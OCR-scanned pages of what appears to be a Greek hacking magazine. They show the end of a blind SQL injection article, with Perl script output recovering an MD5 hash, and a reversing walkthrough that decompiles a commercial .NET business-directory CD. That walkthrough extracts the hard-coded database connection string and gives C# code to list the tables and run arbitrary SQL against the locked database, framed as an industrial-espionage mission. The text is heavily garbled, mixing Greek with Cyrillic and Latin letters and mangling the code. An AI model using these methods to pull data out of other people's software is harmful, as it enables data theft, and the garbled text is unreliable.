Υπάρχουν πολλοί ακόμα ἆλλοι τρόποι, µε τους οποίους θα μπορούσαν va 
βελτιστοποιηθούν οι αναζητήσεις. Ο απλούστερος βασίζεται σε µια στα- 
τιστικἠ ανάλυση και στη συχνότητα εμφάνισης των χαρακτήρων. Βέβαια 
aut η μέθοδος δεν ἐχει καμία χρησιμότητα στην περίπτωση ενὸς MD5 


1. Πολυπλοκότητας О(К):О(п), µε ΚΞ32 kai п=16 
2. Н πολυπλοκότητα όμως παραμένει O(k):O(n), µε ΚΞ32 και п=16, αφού προκύπτει апо то worst case 
scenario. 


Επίθεση στα τυφλά! (μέρος 20) 
MVP 


hash. да μπορούσε όμως να βοηθήσει πολύ στην εύρεση evóc username. 
Όλα αυτά τα ωραία και πολλά ακόµα, χρησιμοποιούνται апо το εργαλείο 
themole. Εμένα µε ἐχει εντυπωσιάσει µε την απλότητα ка! µε την αποτε- 
λεσματικὀτητάἁ του! Σκεφτείτε ὁτι ζητάει μόνο το URL rou τρύπιου web 
application, καθώς και £va NEEDLE (δηλαδἠ ёха matching string, ὁπωςτο 
"by subZraw").. Па να δείτε πόσο εὐκολα γίνονται бта αναλύσαμε, δείτε 
TO μικρὸ βίντεο nou θα βρείτε στο πακέτο BlindSQL.zip. Ὅσοι xpnoipo- 
ποιεῖτε Windows, θα χρειαστείτε το VLC. Επίσης, ἐχετε υπόψη σας ӧті 
το themole δέχεται δεκάδες ἄλλες παραμέτρους, τις οποίες δεν επιδει- 
кубоцує στο βίντεο. Με αυτὲς ενεργοποιούνται αντίµετρα, ὀπως τα IDS 
evasion filters και διάφορα ἄλλα. 


Τελική αποτίμηση 


Ὅσο αυξάνεται η πολυπλοκότητα των web applications, τόσο αυξάνεται 
και η πιθανότητα να προκύψει κἀποιο injection point, εξαιτίας κάποιας 
παράλειψης ото input sanitization. Εξάλλου, пера апо τη μέθοδο eni- 
θεσης που περιγράψαμε αυτή τη фора, υπάρχουν πολλὲς ακόμα (όπως, 
n.x., union select, error based, time based к.а.). Στο като κάτω, ra δε- 
кабєс σχετικἀ εργαλεἰα που κυκλοφορούν στο δίκτυο δίνουν ικανοποι- 
ητικότατα αποτελέσµατα. Έτσι, ra injections διατηρούνται σταθερά στις 
πρῶτες θέσεις προτίμησης των attackers. Πάντως η δικἠ µας nporponr| 
εἶναι να µην µπλέκετε µε live hosts --οὐτε καν για πλάκα-- χωρίς την 
ἄδεια του ιδιοκτήτη. Υπάρχει περίπτωση να κάνετε ζημιά, ὀπως επἰσης και 
να βρείτε το μπελὰ σας! 


[ων Terminal — 
File Edit View Search Terminal Help 


alfénostromo -/Deskto perl retrieve-v1.pl 


* Blind ASCII SQLi by 4li3n - Version 1 (Linear Search) *** 


Search started at: Wed Aug 15 19:38:55 EEST 2012 
Result for user 0: afc2fdb4aac65655dd99851716327778 
Search ended at: Wed Aug 15 19:38:56 EEST 2012 

Hits needed: 512 


perl retrieve-v2.pl 
Blind ASCII SQLi by 4li3n - Version 2 (Linear Search Optimized) 
Search started at: Wed Aug 15 19:39:00 EEST 2012 
Result for user 0: afc2fdb4aac65655dd99851716327778 
Search ended at: Wed Aug 15 19:39:01 EEST 2012 
Hits needed: 251 
perl retrieve-v3.pl 
* Blind ASCII SQLi by 41i3n - Version 3 (Binary Search) *** 
Search started at: Wed Aug 15 19:39:04 EEST 2012 
Result for user 0: afc2fdb4a0c65650d099851716327778 


Search ended at: Wed Aug 15 19:39:04 EEST 2012 
Hits needed: 128 


alfenostromo Des 


3. То Themole απαιτεί ἑνα NEEDLE που va εμφανίζεται όταν η εκάστοτε δοκιμἠ ἦταν επιτυχημένη και то 
οποίο va επαληθεύεται µε τον εντοπισμό κάποιου string. Έτσι, επιλέξαμε то "by subZraw", το οποίο εμφανίζεται 
όταν ша δοκιμή εἶναι πετυχημένη κι ὀχι то "Page not found" που εμφανίζεται στην αντίθετη περίπτωση. 


Ta σκριπτἀκια 
μας σε δράση. To 
καθένα χρησιµο- 
пог! διαφορετικό 

αλγόριθμο avah- 
τησης. Το πρώτο 
εἶναι μάλλον то то 
Xacó, αφού κάνει 
τις περισσότερες 
δοκιμές. Το τρίτο 
κάνει ελάχιστους 
ελέγχους και εἰναι 
το πιο αποδοτικὀ! 
Σε κάθε περίπτω- 
ση, η διάρκεια 

των δοκιμών ἦταν 
ελάχιστη, γιατί οι 
δοκιμές npayuaro- 
ποιούνταν τοπικά... 
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H συγκεκριμένη αποστολἠ της ομάδας WHITE δεν 
αφορά στην Ελλάδα αλλά σε µια λίγο nio παραμυθένια 
χώρα: Αυτή των Ηνωμένων Αραβικών Εμιράτων (UAE). 

Н απαίτηση μάλιστα --kar' εξαίρεση των βασικὠν 

ενεργειών αυτής της υποομάδας των WHITE-- δεν 
εἶναι κἄποιο web attack, αλλά ro reversing. Σας εἰχαμε 
πει βέβαια Оті το πλήρωμα nou βρίσκεται ο πράκτορας 

μας, o shadow, αναλαμβάνει Васка web attacks, 
αλλά αυτὀ δεν εἶναι κι ο κανόνας. Мпореї va ra 
καταφέρει εξ ἴσου кала και στο reversing αλλά, ὀπως 
θα δούμε, και сто programming attack!. 


bu Thiseas 


1. Άλλωστε πως εἶναι δυνατὀν va εἶσαι καλὸς reverser, χωρίς να εἶσαι kaAóc programmer; ` 7 
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Σε ὀλες τις αραβὀφωνες χώρες, οι τηλεπικοινωνίες £xouv την τιμητική 
τους. AUTÒ TO πανδαιμόνιο µε τα κινητά τηλέφωνα, τα smartphones και 
την ὀποια (κατασκευασμένη) роба πηγάζει апо αυτά, δεν εἶναι φαινόμε- 
vo µόνο της Ελλάδας αλλά και της Αιγύπτου, της Ιορδανίας, της Σαου- 
δικἠς Αραβίας κ.ο.κ. Δεν θα μπορούσε λοιπὀν να λείπει апо ӧло auróv 
τον ανταγωνισμό” και η βιοµηχανικἠ karaokonia. Με κάτι τέτοιο ἐχει 
να κάνει και η συγκεκριμένη апостол των WHITE. Συγκεκριμένα, η νέα 
απαϊτηση εἶναι η ακόλουθη: 


Μεγάλη εταιρία τηλεπικοινωνιών που δραστηριοποιείται στις 
Ἀραβόφωνες χώρες παράγει ένα CD-oónyó, µε καταλόγους από 
όλες τις επιχειρήσεις της χώρας και τα στοιχεία τους 
(διευθύνσεις, τηλέφωνα, δραστηριότητα κ.λπ). Αυτό то CD 
έχει µια βάση δεδομένων που είναι κλειδωμένη και περιέχει 
όλα τα δεδομένα που εμφανίζονται (και πιθανόν κι άλλα 
που δεν εμφανίζονται). Καλείστε να ξεκλειδώσετε τη βάση 
δεδομένων και να εξαγάγετε όλα τα αποθηκευμένα δεδοµένα, 
από όλους τους πίνακές της. 


Πάμε λοιπὸν να σας παρουσιάσουμε (µε βάση τις πληροφορίες που ЛаВа- 
με) τη μέθοδο µε την οποία δούλεψε η ομάδα για να φέρει εις πέρας τη 
συγκεκριμένη αποστολή! 


Ομάδα WHITE Section 


Mag ἑστειλαν єма πρόγραμμα που πρέπει va ro σπάσουµε και να βρούμε 
πού κρύβεται η βάση δεδομένων που χρησιμοποιεί. Επίσης θα πρέπει να 
βρούμε ¿va τρόπο για να εξαγάγουµε και όλα τα δεδοµένα. То прото nou 
έχουμε να κάνουμε εἶναι να τρἐξουµε το πρὀγραµμµα και ма то napako- 
λουθούμε. 


| YOUR ONE STOP 
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BI Business Name Category Brand 


І тобі: 


Region 


advertising solutions 


KHAMBATI Mobile Phones (LLC) 
STEEL TRADING LLC. рР.о.вох ‚ Dubai. 


= м 


Tek 04 3 


Automobile Repairing Garage 
P.O.BOX Dubai. 
Tel: 04 2 1 


Automobile Repairing Garage 
P.O.BOX Dubai, 
Tel: 04 2 5 


Automobile Repairing Garage 
P.O.BOX , Dubai, 
Tel: 04 2 1 


Automobile Repairing Garage - Branch 


Previous 1234 5 6 7 8 9 10 Next 


Page 1 Of 23 


Στην εικὀνα 1 βλέπουμε ὁλες τις εταιρεἰες oro Dubai, οι οποίες στην 
επωνυμία τους περιέχουν τη λέξη "mobile". Απ’ ὁ,τι παρατηρούμε, το 
πρὀγραμμα δεν παρέχει δυνατότητα εξαγωγἠς όλων των δεδομένων σε 
κάποιο εξωτερικὀ αρχείο (n.x., Excel). Κάποιοι όμως τα χρειάζονται, εξ 
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OU και η αποστολἠ µας ;) To проүрарра трехе! σε περιβάλλον Windows. 
Mnopo λοιπὀν va παρακολουθἠσω την λειτουργία του ue том Process 
Explorer (апо rnv Sysinternals, п οποία έχει αγοραστεί апо τη 
Microsoft). Τον τρέχω λοιπὸν κι επιλέγω ro EXE της εφαρµογἠς (βλ. 
εικόνα 2). 


8 Process Explorer - Sysinternals: www.sysinternals.com 


=. ΧΙ 
Не Options View Process Find DLL Users Help | 


x 
] 1 | І | κου ΙΙ em m соет x [a Φ 


Process + PID. CPU | Description Company Name B 
Windows NT Logon Application Microsoft Corporation 


E fl) winlogon.exe 
o 

3148 Windows Security Center Notification App 

2360 Winde jate 


Name [бео - | [CompanyName мов 
0.1510.25203 


IRTLSolutionCS. dl 

|Accessibility.ni.dll MET Framework. Microsoft Corporation 1.50727.3053 

System Data dl NET Framework Microsoft Corporation 20.50727.3053 

System Data dll NET Framework Microsoft Corporation 

SystemDatanidl || NET Framework Microsoft Corporation 

System Drawing.ni.dl. | NET Framework Microsoft Corporation 
Microsoft Corporation 


Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Adobe Systems, Inc. 


2.0.50727.3053 
2.0.50727.3053 
2.0.50727.3053 
2.0.50727.3614 
2.0.50727.3053 
2.0.50727.3053 
2.0.50727.3053 
2.0.50727.3053 
2.0.50727.3082 
10218232 

10215232 

5.1.2600.3520 
5.1.2600.2180 

а асаа ава 


System ri di 
System Transaction... 


System Windows.F... | МЕТ Framework. 
System Xml.ni. dll МЕТ Framework. 
Flashi0n.ocx Adobe Flash Player 10.2 152 
Flash Оп.осх Adobe Flash Player 10.2 r152 Adobe Systems, Inc. 
|advapi32. dll Advanced Windows 32 Base АРІ Microsoft Corporation 
|apphelp.dil Application Compatibility Client Libr... Microsoft Corporation 


Αρώνη ως μα 
[CPU Usage: 10.14% [Commit Charge: 15.22% |Processes:35 | 


Βλέπω ὁτι то проурауца τρέχει σε περιβάλλον Microsoft .Net 
framework 2. Αυτό και µόνο φέρνει στο μυαλὸ био λέξεις: .Net 
Reflector! Εἶναι ἑνας απὀ τους nio αξιόπιστους de-compilers που ¿xouv 
κυκλοφορήσει στην αγορά. Και λέω αγορά, διότι апо τις 2 Φεβρουαρίου 
του 2011 o Reflector έγινε εμπορικό προϊόν και πωλεἰται προς 35€. Н 
ἐκδοση που χρησιμοποίησα εἶναι п 7.6, που εἶναι και η πιο πρὀσφατη τη 
στιγμὴ αυτή. 


Ξεκινάω λοιπὀν το Reflector κι επιλέγω το .Net Framework 2, γλὠσσα 
μεταγλώττισης την Ся? και το πρὀγραµµα που θέλω να κάνω de-compile, 
δηλαδἠ ro yellowpages.exe (βλ. εικὀνα 3). 


Νομίζω бт! ἠρθε πια η opa για 
να εξηγήσω το σχέδιο µου: Κάθε 
εφαρµογή .Net (και όχι μόνο) που 


ΝΕΤ Reflector 7.6.0.808 


| εἰς Edi View Tools Help 
оо ы 


μιλάει µε µια βάση δεδομένων, ἐχει XO mscorib (2.0.0.0) es а 
D 1 1 ΒΗ «C3 System (2.0.0.0) 

στον кобіка της µια μεταβλητὴ тя «са Svstem.Xml (2.0.0.0) _ 

μέσω της οποίας πραγματοποιεί τη э (Ἢ N гі хі рез 

σύνδεση της µε αυτή τη βάση. Н || = < Lookin: [О ΑΕ H orom Hn 

εν λόγω μεταβλητή εἶναι γνωστή || 5. m [ES c 

µε To ὀνομα Connection String. "nem o... Er 55 

Μέσα σε αυτή την μεταβλητή Ka- Б |Catadenarie = 

ταχωρούνται пара noAU σηµαντι- UO pHm—— ы = 

кёс πληροφορίες, όπως: То ὀνομα Кеа а : 

και η θέση (στο δίσκο) της Βάσης A ро п 

Δεδομένων, то username και TO My Documents || esie 

password που Χρησιμοποιούνται - p 

για va αποκτήσω πρόσβαση στα νο [йа 

data, καθὼς και διάφορα ἀἄλλα ο B 

στοιχεία nou δεν θα µας απασχο- à τ 

λήσουν eni του παρόντος. Αν βρω nam UNT Fie name: [elonPages.exe τ] τ Oen | 


στον κὠδικα noU ορἰζεται auró 


Places 


Files of type: Assembly files "exe," dll," mcl" хар) 


2. Στην τύχη то ἐβαλα. Av δεν παίξει кат! καλά θα επιλέξω VB (αφού δεν έχω κι ἄλλη επιλογή). 
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TO Connection String, τότε рпоро εὐκολα να φτιάξω va прбүранна- 
κλέφτη το οποίο χρησιμοποιώντας ro Connection String nou βρήκα anó 
TO Kavovikó πρόγραµµα θα προσπελάσει την βάση δεδομένων και θα µου 
εμφανίσει ὁποια δεδομένα θέλω. Θα χρησιμοποιήσω, λοιπὀν, το Reflector, 
για να βρω αυτό ro Connection String. 


Еутопісудс του Connection String 


Αφού επἐλεξα ν΄’ ανοίξω ro Yellow Pages, ro επόμενο βήμα εἶναι va npo- 
σπαθήσω va παρακολουθήσω rnv рог} του προγράμματος σαν va ἐτρε- 
χε κανονικἀ. Μέσω του Reflector παρατηρώ, σε ιεραρχικἠ борд, όλα та 
namesapaces, τις κλάσεις καθώς και τις member-functions του προς εξὲ- 
ταση προγράµµατος (yellowpages.exe, βλ. εικόνα 4). 


ПЕЕ z) [erzo *]| Л] 


СЄ Э ο ο Я 
namespace YellowPages WindowsApp. 5 
* pubic dass AdvancedSearch : SeseCocisi 


IDebuggertionUser Code, ComperGenerated, GeneratedCode( System Resources. Tools.StronglyT ypedResourceBulder", "2.0.0.07] 
тета dass AEResources 


Dubie dss AlphabaticEventArgs : Eventärcs 
pubic dass Alphallavigation : UserContoi 
біс dass BaseCompany : UserControl 
рибі dass BaseControl : UserControl 

рибі dass BrandContainer : UserControl 
Ῥυδὺς cass BrandtEventArgs : Eventàrgs 
ubi dass BrandResults : UserControl 
pubic dass Brands : &aseControl 

pui dass ВиѕіпеѕѕНате : BaseControl 
pubic cass Categories : Базесопоо! 

рс dass Category 

pbi dass CategoryContainer : UserControl 
public dass CategoryEventArgs : Eventàrgs 
Ῥυδὲς dass CategoryResults : UserControl 
Ῥυοὺς cass CompanyContainer : UserControl 


[η 


namespace YellowPages. WindowsApp 


pubic dass CompanyDetailsBold : SeseCompen y 
poi dass CompanyDetailsBoldWithServices : басесотралу 


| тте элла |f 
Д 


NET Reflector 
| Ele gdt мет Toos Heb 


[ро ы агаш | e [τσ zi] 
Β 


Keywords 1 - Em 
ш $$ мапғот © σσ. Я 


тв Фф Ministries Result x 


[STAThread] 
ш “πὲ MinistriesContainer ч 

тя %{ OnlineServices не static void Main) 

ΒΕ “Ὁ PagingControl Application.EnableVisuslStyles(); 

E #$ PagingEventArgs Application. SetCompatibleTextRenderincDe fault(false): 
ΒΙ #$ Phone plication,Run(new МапРог, 

ΕΙ É$ Program 


= №) Base Types 
мап) : Void 
E “Ὁ RelatedCategory 
ш f$ Resource 
I8] су? SearchType 
E #4 WBRes. Result 
B $$ WBResContainer 
E Ὁ YellowPages_windowsApp.BaseControls 
ΒΕ Ὁ YellowPages_WindowsApp.Classes 


ш О Ὑθοννρϑᾳ65, WindowsApp.Classes.General 
E Ὁ YellouPages. WindowsApp.DB. 
E О YellowPages WindowsApp.DBlInstaller 


па Y уаіїнчиювовє Wlindamennn DranarHac |... 
x 
private static vold Main(); E 
Declaring Type: YellonPages, WindowsApp.Program 
Assembly: YellowPages, Version 1.0,0.0 
zi zi 
А 
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Επάνω сто namespace YellowPages (1.0.0.0) πατάω δεξὶ click κι επιλέγω 
Go To Entry Point. Αμέσως, ro Reflector µε τοποθετεἰ στη βασικἠ και 
πρώτη member function που εκτελείται órav τρέξω то πρὀγραμμα, τη 
main (ВА. εικὀνα 5). Πρέπει va πω εδὠ От! ἐχω σταθεί τυχερὀς, διότι то 
πρὀγραμμα ἐχει γραφτεὶ χωρίς την τεχνικἡ του code obfuscation, χωρὶς 
δηλαδὴ ro okónipo μπέρδεμα του κὠδικα µε στὀχο ὀταν κάποιος κάνει 
decompile να µην καταλαβαίνει τίποτα (ἡ σχεδὀν τίποτα). Αυτό το yeyo- 
νὸς ἐχει το кало αποτέλεσμα για μένα --ка TO како για την εταιρεία που 
TO ἐφτιαξε--, ὁτι μπορώ va δω ακριβώςτον κὠδικα που γράφτηκε, µε ότι 
ауто συνεπάγεται. 


Παρατηρώντας τη function main βλέπω бт! калі (αφού τη δημιουργήσει) 
την κλάση MainForm. Μπορώ απλά να κάνω click επάνω στην εντολἠ 
αυτή (την τελευταία), yia να οδηγηθὠ στον κὠδικα αυτής της κλάσης 
(βλ. εικόνα 6). 


NET Reflector 7.6.0.808 ini хі 


| ве Edt Мем Toos Нер 


[ОЮ ы а ш Ie] Afera 
$ MainForm - 
4) Base Types € "€ MainForm..ctor() : Void г их 
© Derived Types 

ш 29 BannersCategory 


[5] 


м дог 
8 AdjustToResolution() : Void 
gÊ btn Ноте. Click Object, EventArgs) : Void 
59 Ып Lang, Clic(Object, EventArgs) 1 Void 
49 ChangeBannerFlash(Int32) : Void 
ЭФ Dispose(Boolean) : Void 
$ FillBanners(List String», Int32, 1nt32, Int32) | Void 
499 TritializeComponent() : Void 
29 LoadBusinessNameForm() : Void 
τῷ LoadCategoryBanners(Int32) : Void 
49 LoadFlashes() : Void 
9 LoadHomepageBanners() : Void соплесбоп.Орепі 0; 
29 LoadsearchBanners() : Void А connection. CloseQ; 
Е LaxkButtons(Boolean) t Void й τι ResourceManager = new ResourceManager СУєїоиадев, WindowsApp.Resource", Assembly. GetExecutingAssembly0); 
49 MainForm Load(Object, EventArgs) : Void this-InitalizeComponent(; 
2% MainForm Resize(Object, EventArgs) : Void this.LoadFlashesQ; 
49 On&randClickedO : Void this.switchTime = int.Parse(ConfigurationManager .AppSettinas[ TimeToSwitchFlash T); 
49 OnBusinessNameclicked() : Void this.m SearchParam! new SearchParametersQ; 
V OncategoryClicked() : Void this.m. busName = 
À anv, 


μμ μη 


Microsoft. Jet. OLEDB. 4.0;Password- | V;User ID-Admin;Data Source -MSInstaller.dli; 


ΠΤ 


public MainForm(); new OnlineServicesQ; 
0; 
: YellowPages. WindowsApo.M; ndsQ; 
Declaring Type: YelowPages Windowsápp.MsinForm о ii vod 


Assembly: YelowPages, Version-1,0.0.0 this.pbox Lang.Left = this.pbox Onlineservices.Right + 10; 
this. AutoScroll = true; 
base.AutoScrollMinSize = new Size(this.pane! Conteiner, Width + this.panel. Ads, Width, (this.panel Container.Height + this.panel LogoSanner.Height) 4 


} 


simm a 
2 


Με την πρὠτη! Απ’ ó,ri βλέπετε, ro Connection String ορίζεται στην 
πρώτη function του προγράµµατος (ως συνήθως), ὥστε va μπορεἰ va 
χρησιμοποιηθεἰ αργότερα. Αυτό ro πολυπόθητο Connection String εἶναι 
το παρακάτω”: 


OleDbConnection connection з new OleDbConnection('Provide 
r-Microsoft.Jet.OLEDB.4.0;Password-V'V;User ID-Admin;Data 
Source-MSInstaller.dll;Mode-Share Deny Write;Extended 
Ргорегёіеѕ=\"\'; Је OLEDB:System database-V'V;Jet OLEDB:Registry 
Path=\'\';Jet OLEDB:Database Раѕѕмога=\'ххххххххххххххххх 
XXM;Jet OLEDB:Engine Type-5;Jet OLEDB:Database Locking 
Mode-1;Jet OLEDB:Global Partial Bulk Ops-2;Jet OLEDB:Global 
Bulk Transactions-1;Jet OLEDB:New Database Password- VV ;Jet 
OLEDB:Create System Database-False;Jet OLEDB:Encrypt 
Database-False;Jet OLEDB:Don't Copy Locale on Compact-False;Jet 
OLEDB:Compact Without Replica Repair-False;Jet OLEDB:SFP-False"); 


3. Па ευνόητους λόγους ro password έχει καλυφθεί µε “ххх... 
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Μπορούμε va εξαγάγουµε κάποια χρήσιμα συμπεράσματα διαβἀζοντάς то. 


1. Н σύνδεση µε тп βάση γἰνεται µέσω rou ΟΙΕΡΒ АРІ της Microsoft. 
Πρόκειται για την enópevn ἐκδοση του πολύ πετυχημένου ODBC 
АРІ. Υλοποιεἰ το μοντέλο COM (Common Object Model), το οποίο 
χρησιμοποιούσε п Microsoft ката κόρον oro παρελθὀν. Πλέον, όλα 
αυτά τείνουν να αντικατασταθούν µε то νεότερο και απαλλαγμένο 
апо то COM (επιτέλους!) ADO.Net (ActiveX Data Objects for .Net). 
Τέλος πάντων, av και η ἴδια п Microsoft δεν ἐχει αποφασίσει ако- 
ра ποιο απ΄ όλα τελικἁ θέλει να κρατήσει ζωντανὸ (http://bit.ly/ 
оттдас), μπορούμε να πούμε µε σιγουριά ὁτι το OIeDB επινοήθηκε 
για va χρησιμοποιεὶ κάποιος την SQL σε µη SQL βάσεις δεδομένων 
(βλ. Microsoft Excel). 


2. H βάση δεδοµένων βρἰσκεται στον τρέχοντα κατάλογο кі ἐχει το 
ὀνομα MSInstaller.DLL. Αν έδωσαν τέτοιο буора οι προγραμµµατι- 
στὲς της εφαρμογἠς yia va μπερδέψουν τον υποψήφιο reverser, 
τὀτε μάλλον εἶναι пара πολύ... ayvoi! Κάποιος πρέπει να τους µι- 
λήσει σοβαρὰ για το obfuscation. Παρατηρώντας το συγκεκριµένο 
αρχείο στο δίσκο, βλέπω Оті ἐχει μέγεθος 150MB, πράγμα nou evı- 
σχύει την άποψη ότι πρὀκειται για τη βάση δεδομένων. Με χρήση 
hex-editor δεν εἰναι δυνατὸ να διαβάσω капота δεδομένα, γεγονὸς 
που δεἰχνει ότι χρησιμοποιείται κάποιας µορφἠς encryption. Με 
τον ідіо editor φαίνεται кабара η υπογραφή Standard Jet DB, της 
Microsoft database engine (βλ. εικὀνα 7). 


3. Ta username (Admin) kai password (ro έχουμε κρύψει yia ευνόη- 
τους λὀγους) φαίνονται кавара σε clear text. 


: ] File Edit Search View Analysis Extras Window 7 


το 3-1: [ή]ανα Ыһ πὶ 


Offset (п) 
00000000 00 01 00 O0 53 74 61 6E 64 61 72 64 20 4A 65 74 
00000010 20 44 42 00 01 00 00 00 Β5 6E 03 62 60 09 C2 55 
00000020 ES A9 67 72 40 ЗЕ 00 9C 7E 9F 90 FF 85 ЗА 31 C5 
00000030 79 BA ED 30 BC DF CC 9D 63 рэ E4 СЗ ЭЕ 46 70 44 
00000040 40 ЕЕ 29 63 88 37 EF DC СЗ FA 73 C6 1F E6 B1 2E Gi)cc7iURÀüsE.zt. 
00000050 B8 60 СС OC 1A 36 74 EA ВЗ B1 CO 6C 23 43 70 37 , `Ї..Єсё°+А1#Ср7 
00000060 СВ 33 AS F9 09 5B 1F 2D 30 2А AF DO 7C 99 08 1Ε É3Xà.[.-0* D|*.. 
00000070 98 FD 76 27 3C E6 6D 22 83 66 5Ε 95 F8 DO 89 24 -^jv'«em"ff «οΏες 
00000080 85 67 C6 1F 27 44 D2 EE CF 65 ED FF 07 C7 46 A1 .gE.'DOileiy.CF; 
00000090 78 16 0С ED E9 2D 62 D4 54 06 00 00 34 2E 30 00 x..íé-bÓT...4.0. 
000000A0 оо оо 00 оо оо 00 00 оо 00 00 оо 00 00 00 00 оо ................ 
оооооово оо оо 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
000000со оо оо 00 00 00 00 00 оо оо оо 00 00 00 00 00 оо ................ 
00000000 00 оо 00 00 00 00 00 оо оо 00 оо 00 00 00 00 00 ................ 
000000EO 00 00 00 00 00 00 00 00 OO 00 оо оо оо оо 00 00 
00000050 00 оо 00 00 00 оо 00 оо OO оо OO оо 00 OO 00 00 
00000100 00 00 00 00 00 00 00 00 OO 00 00 00 00 OO 00 00 
00000110 


Offset: EC 


Δημιουργία του ...κλέφτη 


Με βάση τα παραπάνω στοιχεία nou απέκτησα, рпоро va κατασκευάσω 
ἑνα πρὀγραμµα το οποίο θα κάνει χρήση του συγκεκριμένου Connection 
String και θα διαβάζει τη βάση δεδομένων. AuTÓ που στην праүратікотп- 
τα θα φτιάξω θα "vai ἑνας SQL command executer (εἶναι πολύ βολικὀς). 
Δηλαδή, θα υπάρχει µια φόρμα p’ va text-box στο οποίο θα βάζει kå- 
ποιος την εντολἠ σε SQL που θέλει να εκτελέσει, θα πατάει ἑνα button 
στο στιλ "Execute" και τα δεδοµένα anó το αποτέλεσµα της εντολἠς θα 
εμφανίζονται στη φόρμα. Χμ, υπάρχει όμως ἑνα προβληματάκι. Πώς στην 
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ευχἠ θα εκτελέσει κἀποιος ша εντολἠ SQL, av δεν γνωρίζει τα ονόματα 
όλων των πινάκων που υπάρχουν στη βάση δεδοµένων; 


Προφανώς οφείλω να φτιάξω και µια διαδικασία nou να εμφανίζει στο 
χρήστη ὁλους τους πίνακες που υπάρχουν στη βάση δεδομένων, έτσι 
ώστε να μπορέσει αυτός να τους χρησιμοποιήσει στις εντολὲς TOU. TO 
πρὀγραμμα θα το φτιάξω σε C£, av και θα μπορούσα να χρησιμοποιήσω 
όποια ἄλλη γλὠσσα ἐχει τη δυνατότητα ма διαχειριστεἰ το ΟΙΕΡΒ АРІ. 


ба αναλύσω τις δύο παραπάνω διαδικασἰες και μετὰ θα σας δείξω µερικἀ 
screenshots апо το npòypappa. 


Υπάρχει µια συγκεκριμένη διαδικασία μέσω της οποίας --και µε χρήση 
του ΟΙΕΡΒ АРІ μέσω της συνάρτησης GetOleDbSchemaTable-- µπορεί 
κάποιος να εξαγάγει τα ονόματα των πινάκων της βάσης δεδοµένων. Εἶναι 
η παρακάτω. 


OleDbConnection cn - new OleDbConnection(); 

DataTable schemaTable; 

cn.ConnectionString з "Provider-Microsoft...SFP-False"; 

cn.Open(); 

schemaTable - cn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, 
new Object[] ( null, null, null, "TABLE" 3); 

listBox1.Items.Clear(); 

for (int 1 = 0; i « schemaTable.Rows.Count; 1++) 


{ 
listBox1.Items.Add(schemaTable.Rows[i].ItemArray[2]. 
ToString()); 


cn.Close(); 

Απ’ ότι βλέπετε, δεν εἶναι παραπάνω апо 10 γραμμὲς κὠδικα. Μη δώσετε 
μεγάλη βάση στην 3η γραμμὴ, διότι την ἐχω κὀψει για va µην πιάνει πολύ 
χώρο. То праунатіко string που περιέχει εἶναι το Connection String, nou 
βρήκα παραπάνω. Αυτόν τον κὠδικα θα rov βάλω μέσα о" ἑνα buton-click 
event, ώστε να ενεργοποιείται µε ro патпра ενὸς button της φόρμας µου. 
Το παραπάνω κομμάτι κὠδικα γεμίζει” va listbox (µε ro буора listbox1). 
Αυτὸ σημαίνει οτι τα αποτελέσµατα, δηλαδἠ τα ονόματα των πινάκων, θα 
εμφανίζονται σε ἑνα listbox στη φόρμα µου. 


Επίσης, θα υπάρχει (όπως eina) και то text-box ónou θα μπορεί κάποιος 
να γράφει єутоЛес SQL και να τις τρέχει πατώντας va button. Ακόμα кі 
αυτή η διαδικασἰα εἶναι поло απλή. Ακολουθεἰ o κὠδικας. 


string strProvider = "Provider...SFP-False'; 

string strSql = textbox SQL COMMAND.Text; 
OleDbConnection con = new OleDbConnection(strProvider); 
OleDbCommand cmd - new OleDbCommand(strSql, con); 
соп.Ореп(); 

cmd.CommandType - CommandType.Text; 

OleDbDataAdapter da = new OleDbDataAdapter(cmd); 
DataTable dTable - new DataTable(); 


try 
t 
da.Fill(dTable); 
dataGridViewl.DataSource = dTable; 
) 


catch (Exception err) 


{ 


WV'HAGIKER 


кс ць... 


MessageBox.Show(err.Message); 


con.close(); 
Στην 1n γραμμὴ ορἰζω ro Connection String (εἶναι και πάλι σύντμηση au- 
TOU που βρήκα πριν). Στη 2η karaxopo σε ша µεταβλητή то περιεχόμενο 
του text box µε την εντολή SQL nou ἐγραψε ο χρήστης. Στις γραμμές 3 
και 4 δημιουργὠ τις μεταβλητὲς για το connection kai то SQL command. 
Στην 5, ανοίγω ro connection. Στις 6 ἑως κι 8 φτιάχνω την επικοινωνία 
του προγράµµατος μέσω του ΟΙΕΡΒ, pe тп συγκεκριμένη εντολἠ SQL nou 
δόθηκε. Οι επὀµενες δύο γραμμὲς (αυτὲς nou εἶναι µέσα στο βρὀχο try, 
εκτελούν την εντολἠ που δόθηκε. Απ’ буті βλέπετε, εισάγουν ra αποτε- 


Aécpara с’ єма dataGrinView που ¿xw βάλει στη φόρμα (βλ. εικὀνα 8). 


select top 10 * from companies 


ID NAME EN NAME, AR NAME ABR EN МАМЕ ABR AR ADDRESS AR || FK AREAI 
—_ ев [сс 55184 55184 12 
2 А Wahda Expres... уе)! 829) ( 35387 35387 1 TENEI zum 
3 А Wahda Expres... |5! ἕσο-ϱ) (... 55184 55184 12 COMPANY BRANDS 
TI 

4 711 RentACar | 71144 ud х= 52711 52711 1 ананга 

5 Abu Dhabi Classi... |55 „дё . 57171 57171 1 COMPANY KEWORDS-EN 
3 Abu Samecha Ve... | аа si Jas... 52697 52697 1 ο PHONES 

1 А Haramain Ladi... | LY оед Jas... 70672 70672 1 COMPANY SERVICE. DETAILS 

= 5 Ξ COMPANY SERVICES 
12 А Majan Gents ... | ШЫ ο) yalla... 70793 70793 1 MPANY-SYNONYMS AR 
м А Nukhba Jewell... | àui ci уэе 51888 51888 1 COMPANY. SYNONYMS | 
а COUNTRIES 
15 А Shahba Rent ... | J| жә eue. 53771 53771 1 DEBUG 
DIRECTORIES 


LOG ADMIN SESSION, ACTION 
SIONS 


Αν κάτι δεν έχει πάει кала θα εκτελεστεί ro exception και θα µου εμφα- 
νἰσει (µέσω rou MessageBox) το μήνυμα λάθους που επέστρεψε o driver 
επικοινωνίας µε τη βάση δεδοµένων (βλ. εικὀνα 9). Н τελευταία сумар- 
τηση, η con.close(), κλείνει το connection ...ki ἄντε γειά! 


select top 10 * from addresses 


The Microsoft Jet database engine cannot find the input table or query 
'addresses'. Make sure it exists and that its name is spelled correctly. 

А Wahda Expres... 
А Wahda Eres... 
